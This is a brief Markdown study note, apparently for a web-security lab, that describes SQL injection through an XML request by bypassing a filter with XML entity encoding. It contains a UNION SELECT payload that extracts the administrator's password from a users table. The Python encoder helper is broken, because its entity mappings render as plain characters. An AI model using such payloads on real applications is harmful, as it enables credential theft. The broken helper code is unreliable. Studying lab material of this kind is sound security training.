44 lines
1.4 KiB
Markdown
44 lines
1.4 KiB
Markdown
|
|
||
|
|
## XML
|
||
|
|
|
||
|
|
**Steps**
|
||
|
|
- Capture the request from BrupSuite (displaying some sort of XML)
|
||
|
|
|
||
|
|
- Find the number of column (You can simply guest from the output of the original request)
|
||
|
|
|
||
|
|
- trying to bypass some filter, you might see that simply encoding the request (URL might not work, this is because XML use a specific encoding (More information ---> [HERE](https://en.wikipedia.org/wiki/List_of_XML_and_HTML_character_entity_references)))
|
||
|
|
- Also, here we are trying to encode character (this is different then simple url encoding)
|
||
|
|
- Using (HARACTER;), we can see that SQL injection is valid
|
||
|
|
|
||
|
|
Query Example
|
||
|
|
```
|
||
|
|
#Not Encoded
|
||
|
|
4 UNION SELECT password WHERE username='administator'--
|
||
|
|
|
||
|
|
$Encoded
|
||
|
|
4 UNION SELECT password FROM users WHERE username='administrator'-- 
|
||
|
|
```
|
||
|
|
|
||
|
|
|
||
|
|
## Tool (Python)
|
||
|
|
|
||
|
|
XML encoder (Possible to modify it to encode character)
|
||
|
|
``` Python
|
||
|
|
import xml.sax.saxutils
|
||
|
|
|
||
|
|
# Define the string to be encoded
|
||
|
|
string = "this is a string to be XML encoded"
|
||
|
|
|
||
|
|
# Encode the string using the escape() method
|
||
|
|
encoded_string = xml.sax.saxutils.escape(string, {
|
||
|
|
"'": "'", # Single quote
|
||
|
|
'"': """, # Double quote
|
||
|
|
"&": "&", # Ampersand
|
||
|
|
"<": "<", # Less than
|
||
|
|
">": ">", # Greater than
|
||
|
|
" ": " " # Space
|
||
|
|
})
|
||
|
|
|
||
|
|
# Print the encoded string
|
||
|
|
print(encoded_string)
|
||
|
|
```
|